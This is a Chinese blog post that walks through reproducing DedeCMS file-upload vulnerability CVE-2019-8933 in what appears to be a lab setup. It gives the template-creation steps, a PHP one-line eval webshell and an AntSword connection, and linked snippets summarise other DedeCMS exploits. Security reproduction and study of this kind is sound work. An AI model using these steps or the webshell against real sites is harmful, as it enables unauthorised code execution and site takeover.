dedecms 文件上传 (CVE-2019-8933)漏洞复现

已于 2024-04-03 09:50:26 修改
阅读量4k 收藏 26
点赞数 8
文章标签: php 开发语言
于 2022-09-03 09:03:11 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/weixin_42675091/article/details/126673353
版权

1.漏洞描述

        Desdev DedeCMS(织梦内容管理系统)是中国卓卓网络(Desdev)公司的一套基于PHP的开源内容管理系统(CMS)。该系统具有内容发布、内容管理、内容编辑和内容检索等功能。 Desdev DedeCMS 5.7SP2版本中存在安全漏洞。远程攻击者可通过在添加新模板时,将文件名../index.html更改成../index.php利用该漏洞向uploads/目录上传.php文件并执行该文件。 后台路径:/uploads/dede/ 后台密码:admin:admin

2.通过后台登录http://ip:port/uploads/dede/

9e822c886ba84db8bd641f91b618079e.png

 3.模板-默认模板管理-新建模板

8a5fde6ae980434f8fd4953f16053aa3.png

4.在内容框输入php脚本后保存

<?php eval($_POST[123]);?>

c0ff18ce56eb4ecfae14b27eb625f1ce.png

5.生成-更新主页HTML-浏览选择新建的模板-更改后缀为php...

26ac8d777ef642ef815008c87d70fb79.png

 6.使用蚁剑连接http://ip:port/uploads/index.php

f482e4a859264cd88a8d7c8a1d652476.png

 

 

 

漏洞复现DedeCMS存在文件包含漏洞导致后台getshell(CVE-2023-2928)
李火火的安全圈
05-31 4160
uploads/dede/article_allowurl_edit.php存在缺少对该文件中写入内容的任何过滤是导致该漏洞的因素之一,在5.7.106之前的DedeCMS中发现了一个漏洞。它已被宣布为关键。受此漏洞影响的是文件uploads/dede/article_allowurl_edit.php的未知功能。操纵参数allurls会导致代码注入。可以远程发起攻击获得网站控制权限。
DedeCMS V5.7文件上传漏洞复现
weixin_51047454的博客
03-20 1538
CVE-2018-20129-DedeCMS V5.7 SP2前台文件上传漏洞复现 登录管理页面后,开启会员功能(默认是关闭的) 回到首页,用户登录后,点击会员中心。 打开内容中心(第一次进入会提示完善个人信息,完善一下,不然不能操作) 重点开始 4. 发表文章的表单最下方有一个图片的图标,点击可以选择上传图片到服务端。 制作图片码 上传 抓包修改文件后缀:p*hp 连接,成功 代码审计 为什么用.ph%p就可以绕过检测了?我们来看看源码中的问题部分。 找到图片的校验部分的源
dedecms漏洞组合拳拿站(渗透笔记)
热门推荐
一个安全研究员
07-13 1万+
如题
DeDeCMS靶场漏洞复现
2401_82451607的博客
09-14 823
DeDeCMS靶场漏洞复现
DedeCMS V5.7前台文件上传漏洞(CVE-2018-20129)
m0_65761158的博客
03-21 777
安装PHPstudy导入源码打开软件后,点击网站,自己新建一个网站,随便起一个域名如:www.xxx.xom随后点击管理进入部署的网站的根目录, 将事先准备的DedeCMS的源码包解压,并将uploads文件夹复制进根目录中。按照提示继续,直到出现用户界面,这里的数据库密码来自于phpstudy中数据库的密码,还要记住你自己的用户名及密码,之后会登录会需要,然后继续即可。返回地址是:/DedeCMS/uploads/uploads/allimg/240527/1-24052H31ITP.php
漏洞复现-dedecms-文件上传】vulfocus/dedecms-cve_2019_8933
10-16 4456
dedecms-文件上传】后缀
DeDeCMS-漏洞复现
weixin_57682301的博客
08-03 702
2.上传后访问你上传的一句话木马文件 我这里写的一句话木马为phpinfo,显示成功即可证明注入。4.点击生成--更新主页html,将htm后缀改成php并且生成静态,点击更新主页html。5.访问此页面,没有报错证明注入成功(由于没有回显,这里输入的POST传参)1.点击核心--文件式管理器 点击文件上传,将我们的一句话木马进行上传。2.进入后点击模板--默认模板管理,找到index.htm。3.点击右方的编辑进入后改成写入的一句话木马,然后点击保存。1.点击模板--广告管理--生成一个新广告。
DedeCMS V5.7sp2最新版本parse_str函数SQL注入漏洞
网站安全专家
08-10 3950
织梦dedecms,在整个互联网中许多企业网站,个人网站,优化网站都在使用dede作为整个网站的开发架构,dedecms采用php+mysql数据库的架构来承载整个网站的运行与用户的访问,首页以及栏目页生成html静态化,大大的加快的网站访问速度,以及搜索引擎的友好度,利于百度蜘蛛的抓取,深受广大站长以及网站运营者的喜欢。最近我们发现dedecms漏洞,存在高危的parse_str函数sql注入漏...
dedecms 文件上传CVE-2019-8933
weixin_57567689的博客
10-21 823
dedecms 文件上传CVE-2019-8933
CVE-2018-20129-——DedeCMS V5.7 SP2前台文件上传漏洞
玄道的网安博客
12-20 5766
0x01 漏洞概述 Desdev DedeCMS(织梦内容管理系统)是中国卓卓网络(Desdev)科技有限公司的一套开源的集内容发布、编辑、管理检索等于一体的PHP网站内容管理系统(CMS)。 Desdev DedeCMS 5.7 SP2版本中的uploads/include/dialog/select_images_post.php文件存在文件上传漏洞,远程攻击者可利用该漏洞上传并执行任意PH...
wordpress 文件下载 (CVE-2019-1998
最新发布
03-30
嗯,用户想解决WordPress的CVE-2019-1998文件下载漏洞的...[^2]: dedecms 文件上传CVE-2019-8933)。点击生成——更新主页HTML——主页位置——选择主页模板(浏览选择一句话木马文件)——首页模式——更新主页HTML.
CMS V5.7 SP2漏洞复现CVE-2018-20129)
haoaaao的博客
04-04 4991
0x00 前置 1、CVE中对该漏洞的描述: 在 DedeCMS V5.7 SP2 中发现了一个问题。uploads/include/dialog/select_images_post.php 允许远程攻击者通过双扩展名和修改的“.php”子字符串以及 image/jpeg 内容类型上传和执行任意 PHP 代码,如 filename=1 所示。 jpg.p*hp 值。 2、所需工具 (1)cms网站源码版本:DedeCMS V5.7 SP2 下载链接...
DedeCMS文件上传漏洞
Loooyoooxooo的博客
12-08 946
1、此版本的DedeCMS后台存在文件上传漏洞,在渗透过程中我们可以通过利用其它漏洞或者暴力破解的方式获取管理员账号和密码,并登录到后台进行此漏洞利用(此实验主要练习文件DedeCMS上传漏洞利用);6、依次点击 “生成” - “更新主页HTML” - “浏览选择新建的模板”,在"主页位置"输入框中将文件后缀修改为.php,首页模式选择"生成静态",并点击更新主页HTML。>换成一句话木马<?7、进入生成的链接,成功执行php代码,漏洞测试成功,在进行动态的输出框中,点击"浏览"
DedeCms织梦系统漏洞复现
LIU6636LIU的博客
03-13 2889
1 部署好之后发现系统默认管理路径是dede,登陆管理后台可以通过地址然后有dedecms安全提示直接打开根目录修改dede文件夹为LYP重新进去管理员后台对数据进行还原看一下网站的地址接着生成新的网站然后即可访问网站,CMS搭建完毕首先打开后台管理页面开启会员功能这样就可以注册一个账户。
DedeCMSCVE-2019-8933
m0_74559567的博客
03-15 1330
密码就是在字典里面,但是我们发现并没有爆破成功,原因是请求过快,输入错误的时候网页会跳转错误页面然后再返回再次登录。查看源代码,找到验证码的url,当然也可以右键打开验证码链接,或者直接拖就可以。然后再次开始攻击,攻击完成后,排序长度,不一样的基本是成功的。返回Bp插件界面,然后右键导入模板,填入接口url。payload1的位置,添加常用的密码字典进行爆破。点击浏览,是可以被成功解析的,使用蚁剑进行连接。payload2位置,选择的是验证码的插件。抓包验证码的网页后,右键发送到插件。
DedeCMS文件上传(CVE-2019-8933)
m0_65150886的博客
02-21 613
index.php利用该漏洞向uploads/目录上传.php文件并执行该文件。后台路径:/uploads/dede/ 后台密码:admin:admin。该系统具有内容发布、内容管理、内容编辑和内容检索等功能。5.点击生成->更新主页HTML,选择主页模板为default/newtpl.htm,主页位置修改为php文件,首页模式选择静态,最后点击更新主页HTML。2.访问http://ip:port/uploads/dede,1.访问http://ip:port,出现如下页面,开始实验。
DeDeCMS漏洞复现(基于PHP搭建)
2301_79638144的博客
11-07 1382
dedecms平台搭建及漏洞复现
漏洞复现-dedecms文件上传CVE-2019-8933
qq_58683895的博客
10-27 1138
漏洞复现-5.7SP2版本dedecms文件上传—_CVE-2019-8933
dedecms 文件上传CVE-2019-8933
xy_wjyjw的博客
10-28 513
点击生成——更新主页HTML——主页位置——选择主页模板(浏览选择一句话木马文件)——首页模式——更新主页HTML。在内容中输入后门代码(一句话木马)
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值